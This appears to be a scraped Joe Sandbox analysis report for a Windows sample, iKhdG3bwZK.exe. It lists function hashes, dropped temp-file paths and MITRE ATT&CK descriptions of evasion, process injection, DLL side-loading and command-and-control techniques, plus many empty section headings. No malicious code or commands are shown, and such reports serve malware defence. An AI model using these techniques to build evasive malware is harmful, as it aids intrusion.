Opcode ID: 9e5e02ec3ae36198606aa10b822d832cfef97aae54456fdc6b76e3fc24730506
Instruction ID: 6806ea7d0f31b98e40dca8a202ead23bba02e7b3cd24b420eef3d9bab78bb807
Opcode Fuzzy Hash: 9e5e02ec3ae36198606aa10b822d832cfef97aae54456fdc6b76e3fc24730506
Instruction Fuzzy Hash: F8F02278614209EFCB44DF58D580959B7A5EB48360F10C299BD198B345D631EE81DB94

Non-executed Functions

Function 0070B672 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1781804541.0000000000709000.00000020.00000001.01000000.00000003.sdmp, Offset: 00709000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_709000_iKhdG3bwZK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
Instruction ID: 3aed54436f5767a83b01f55326dea564c088d466d319321e9a1229c6b183aa19
Opcode Fuzzy Hash: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
Instruction Fuzzy Hash: DCC04C7595664CEBC711CB89D541A59B7FCE709650F100195EC0893700D5356E109595

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report iKhdG3bwZK.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\4c76ba0e

C:\Users\user\AppData\Local\Temp\4ed6fba4

C:\Users\user\AppData\Local\Temp\6460e813

C:\Users\user\AppData\Local\Temp\config

C:\Users\user\AppData\Local\Temp\romr

C:\Users\user\AppData\Local\Temp\yrpfhpihdypx

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Windows Analysis Report
iKhdG3bwZK.exe

Function 0070AFA2 Relevance: 1.6, APIs: 1, Instructions: 123
nativeCOMMON

Function 0070A882 Relevance: 4.6, APIs: 3, Instructions: 79
fileCOMMON

Function 0070B6C2 Relevance: 4.0, APIs: 2, Instructions: 995
memoryCOMMON

Function 0070AE72 Relevance: 3.0, APIs: 2, Instructions: 50
fileCOMMON

Function 0070A4B2 Relevance: 1.5, APIs: 1, Instructions: 25
libraryCOMMON

Function 0070C4D2 Relevance: 1.5, APIs: 1, Instructions: 204
COMMON

Function 0070AF42 Relevance: 1.3, APIs: 1, Instructions: 23
memoryCOMMON